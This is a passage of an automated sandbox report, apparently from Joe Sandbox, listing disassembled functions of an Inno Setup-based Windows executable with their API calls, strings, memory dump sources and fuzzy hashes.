                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00463240 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                                                                                                                                                  • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cursor$Load
                                                                                                                                                                                                                                  • String ID: $ $Internal error: Item already expanding
                                                                                                                                                                                                                                  • API String ID: 1675784387-1948079669
                                                                                                                                                                                                                                  • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                                                                                                                                  • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00453D30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                                                                                                                  • API String ID: 390214022-3304407042
                                                                                                                                                                                                                                  • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                                                                                                                                  • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00476C50 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                                                                                                                                                  • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassInfoLongMessageSendWindow
                                                                                                                                                                                                                                  • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                                                                                                                  • API String ID: 3391662889-4234151509
                                                                                                                                                                                                                                  • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                                                                                                                                                  • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00408720 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                                                                                                                                                                    • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                                                                                                                    • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                  • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                  • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                                                                                                                                                  • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004116F4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                                                                                                                                                                  • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                                                                                                                                                                    • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                                                                                                                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                                                                                                                                                                    • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                                                                                                                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                                                                                                                  • String ID: ,$?
                                                                                                                                                                                                                                  • API String ID: 2359071979-2308483597
                                                                                                                                                                                                                                  • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                                                                                                                                  • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041BE63 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                                                                                                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1030595962-0
                                                                                                                                                                                                                                  • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                                                                                                                                  • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041CED8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                                                                                                                                                  • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                                                                                                                                                  • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                                                                                                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                                                                                                                                                  • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2222416421-0
                                                                                                                                                                                                                                  • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                                                                                                                                  • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004572DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                                                                                                                                                                    • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                                                                                                                                                                    • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                                                                                                                    • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                                                                                                                    • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 004573B3
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                                                                                                                                                  • String ID: [Paused]
                                                                                                                                                                                                                                  • API String ID: 1007367021-4230553315
                                                                                                                                                                                                                                  • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                                                                                                                                  • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046B420 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cursor$LoadSleep
                                                                                                                                                                                                                                  • String ID: CheckPassword
                                                                                                                                                                                                                                  • API String ID: 4023313301-1302249611
                                                                                                                                                                                                                                  • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                                                                                                                                                  • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00477C6C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                                                                                                                                                    • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                                                                                                                                                    • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                                                                                                                                                                  • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                                                                                                                  • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                                                                                                                  • API String ID: 613034392-3771334282
                                                                                                                                                                                                                                  • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                                                                                                                                  • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00459784 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                                                                                                                                                  • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                                                                                                                                                  • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                                                                                                                                                  • Fusion.dll, xrefs: 004597DF
                                                                                                                                                                                                                                  • CreateAssemblyCache, xrefs: 00459836
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
